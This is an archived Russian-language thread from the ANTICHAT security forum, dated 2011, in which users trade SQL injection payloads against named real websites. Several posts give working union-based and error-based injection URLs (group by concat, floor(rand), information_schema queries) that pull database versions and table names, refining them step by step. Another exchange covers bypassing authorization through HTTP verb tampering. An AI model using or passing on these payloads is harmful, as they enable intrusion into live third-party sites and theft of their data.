ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

12.05.2011, 15:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Когда отключен вывод ошибки, а из-за неверно переданных данных в переменной id рушится запрос к базе, и в ответ ничего не возвращается к выводу, как думаешь возможно?
Код:
Code:
http://goldenformula.net/news.php?id=(47)and(1=0)union/*!all*/select(1),2,3,4,version(),6--+
|
|
|
|

12.05.2011, 15:59
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме: 19069
Репутация:
0
|
|
вот вот про это где можно почитать, на русском
By manipulating the HTTP verb it was possible to bypass the authorization on this directory. The scanner sent a request with POST HTTP verb and managed to bypass the authorization. An application is vulnerable to HTTP Verb tampering if the following conditions hold:
it uses a security control that lists HTTP verbs
the security control fails to block verbs that are not listed
it has GET functionality that is not idempotent or will execute with an arbitrary HTTP verb
For example, Apache with .htaccess is vulnerable if HTTP verbs are specified using the LIMIT keyword:
является ифективным методом атаки?
|
|
|

12.05.2011, 16:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от Koren
Koren said:
вот вот про это где можно почитать, на русском
By manipulating the HTTP verb it was possible to bypass the authorization on this directory. The scanner sent a request with POST HTTP verb and managed to bypass the authorization. An application is vulnerable to HTTP Verb tampering if the following conditions hold:
it uses a security control that lists HTTP verbs
the security control fails to block verbs that are not listed
it has GET functionality that is not idempotent or will execute with an arbitrary HTTP verb
For example, Apache with .htaccess is vulnerable if HTTP verbs are specified using the LIMIT keyword:
является ифективным методом атаки?
Если я не ошибаюсь, то эта уязвимость позволяет обходить basic-авторизацию отправляя запросы постом а не гетом.
https://www.aspectsecurity.com/documents/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf
|
|
|
|

12.05.2011, 20:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 149611
Репутация:
81
|
|
Сообщение от Expl0ited
Expl0ited said:
Когда отключен вывод ошибки, а из-за неверно переданных данных в переменной id рушится запрос к базе, и в ответ ничего не возвращается к выводу, как думаешь возможно?
Код:
Code:
http://goldenformula.net/news.php?id=(47)and(1=0)union/*!all*/select(1),2,3,4,version(),6--+
Кстати, можно и так: +and+1=0+union+select+1,2,3,4,database(),6--
|
|
|
|

12.05.2011, 21:02
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Не получается вывести версию БД.
http://www.postyourlink.info/links10.php?new=1&catid=-52+order+by+5+--+
|
|
|

12.05.2011, 21:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 1075
Репутация:
1
|
|
Сообщение от FlaktW
FlaktW said:
Не получается вывести версию БД.
http://www.postyourlink.info/links10.php?new=1&catid=-52+order+by+5+--+
Код:
Code:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+version()),floor(rand(0)*2))/*!having*/+min(0)+or+1--+
|
|
|
|

12.05.2011, 22:00
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Сообщение от raw
raw said:
Код:
Code:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select+version()),floor(rand(0)*2))/*!having*/+min(0)+or+1--+
Дальше не выводится, а где ошибка не пойму:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((s elect+table_name+from+information_schema.`tables`+ limit+0,1),floor(rand(0)*2))/*!having*/+min(0)+or+1+--+
|
|
|

12.05.2011, 22:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 1075
Репутация:
1
|
|
Сообщение от FlaktW
FlaktW said:
Дальше не выводится, а где ошибка не пойму:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((s elect+table_name+from+information_schema.`tables`+ limit+0,1),floor(rand(0)*2))/*!having*/+min(0)+or+1+--+
Код:
Code:
http://www.postyourlink.info/links10.php?new=1&catid=52+or+1+group+by+concat((select/*!table_name*/+from+information_schema.tables+limit+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1--+
Ты так и будешь спрашивать каждый следующий шаг? Тогда я пожалуй катапультируюсь из данного трэда.
|
|
|
|

13.05.2011, 01:29
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме: 58603
Репутация:
3
|
|
Привет всем. Как вывести часть файла..? more что-то не работает.
При cat начало не видно... большой файл.
|
|
|

13.05.2011, 01:33
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме: 1187799
Репутация:
62
|
|
Сообщение от IMMORTAL_S
IMMORTAL_S said:
Привет всем. Как вывести часть файла..? more что-то не работает.
При cat начало не видно... большой файл.
Какая именно ось?
Пробуй less..
Почему в уязвиостях? Или я что-то не понял? о_О
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|